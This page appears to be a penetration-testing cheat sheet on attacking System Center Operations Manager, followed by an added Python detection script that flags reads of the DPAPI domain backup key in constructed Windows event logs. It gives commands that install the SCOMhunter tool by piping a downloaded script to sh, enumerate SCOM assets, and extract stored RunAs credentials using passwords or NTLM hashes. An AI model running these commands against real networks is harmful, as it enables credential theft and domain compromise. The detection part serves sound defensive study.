SCOM

System Center Operations Manager (SCOM) exploitation.

Sources: https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-1/ and https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/

Install SCOMhunter

# Link to the tool (https://github.com/garrettfoster13/scomhunter)
curl -LsSf https://astral.sh/uv/install.sh | sh
git clone https://github.com/garrettfoster13/scomhunter
cd scomhunter
uv sync

Enumerate LDAP for SCOM assets

# With a password
uv run scomhunter.py find -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>
# With an NTLM hash
uv run scomhunter.py find -u <USERNAME> -hashes <NTLM-HASH> -d <DOMAIN-FQDN> -dc-ip <DC-IP>

Extract DPAPI-protected RunAs credentials (domain admin required)

# With a password
uv run scomhunter.py dpapi -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>

# With an NTLM hash
uv run scomhunter.py dpapi -u <USERNAME> -hashes <NTLM-HASH> -d <DOMAIN-FQDN> -dc-ip <DC-IP>
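Detection-side companion to the step above, added here as an example; it is not code from the page, from the SpecterOps posts, or from the SCOMhunter project. Recovering DPAPI-protected secrets across a domain as a domain admin commonly involves reading the domain DPAPI backup key from the LSA secrets store on a domain controller, which shows up as Security Event ID 4662 with ObjectType "SecretObject" and an ObjectName containing "BCKUPKEY". Whether SCOMhunter's dpapi command takes exactly that path is an assumption, not something the page states. The log lines, account names and host names below are constructed for the example, in a simple key=value export format rather than real Windows output.

```python
"""Flag DPAPI domain backup key reads (Event ID 4662, SecretObject, BCKUPKEY)
in a batch of Windows Security log records. Added example; the log format,
accounts and hosts are constructed and are not real data."""
import re
from collections import Counter

# Constructed sample records. A SIEM would supply these fields natively;
# here they are flattened to key=value pairs for an offline demonstration.
SAMPLE_LOG = """\
EventID=4662 Computer=DC01 SubjectUserName=svc-backup SubjectDomainName=CORP ObjectType=SecretObject ObjectName=Policy\\Secrets\\BCKUPKEY_PREFERRED AccessMask=0x2
EventID=4662 Computer=DC01 SubjectUserName=svc-backup SubjectDomainName=CORP ObjectType=SecretObject ObjectName=Policy\\Secrets\\BCKUPKEY_P AccessMask=0x2
EventID=4662 Computer=DC01 SubjectUserName=jdoe SubjectDomainName=CORP ObjectType=DS-Object ObjectName=CN=Users,DC=corp,DC=local AccessMask=0x100
EventID=4662 Computer=DC01 SubjectUserName=DC01$ SubjectDomainName=CORP ObjectType=SecretObject ObjectName=Policy\\Secrets\\$MACHINE.ACC AccessMask=0x2
EventID=4624 Computer=DC01 SubjectUserName=jdoe SubjectDomainName=CORP LogonType=3
"""

# key=value tokens; values run to the next whitespace so DNs with '=' survive.
KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> dict:
    """Turn one flattened record into a field dictionary."""
    return {m.group(1): m.group(2) for m in KV.finditer(line)}


def is_backup_key_read(ev: dict) -> bool:
    """Match the classic domain backup key retrieval pattern:
    4662 on an LSA SecretObject whose name contains BCKUPKEY, with the
    read access mask (0x2)."""
    return (
        ev.get("EventID") == "4662"
        and ev.get("ObjectType") == "SecretObject"
        and "BCKUPKEY" in ev.get("ObjectName", "")
        and ev.get("AccessMask") == "0x2"
    )


def detect(log: str, allowlist: frozenset = frozenset()) -> list:
    """Return the matching records, skipping accounts on an explicit
    allowlist (e.g. a sanctioned key-management job) so the rule can be tuned
    without weakening the match itself."""
    hits = []
    for line in log.splitlines():
        ev = parse_line(line)
        if not ev or not is_backup_key_read(ev):
            continue
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if subject in allowlist:
            continue
        hits.append(ev)
    return hits


def summarize(hits: list) -> dict:
    """Count backup key reads per subject@DC; more than one read per subject
    in a short window is the usual sign of a tool walking both key names."""
    return dict(
        Counter(
            f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}@{ev['Computer']}"
            for ev in hits
        )
    )


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for who, n in summarize(found).items():
        print(f"{who}: {n} DPAPI backup key read(s)")
```

The two BCKUPKEY reads by svc-backup are flagged; the machine account reading its own $MACHINE.ACC secret and the directory object access are not, because the match keys on the object name rather than on SecretObject access alone. Object access auditing has to be enabled on the domain controllers for 4662 to be emitted at all, and any account legitimately permitted to read the backup key belongs on the allowlist rather than in a weakened rule.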
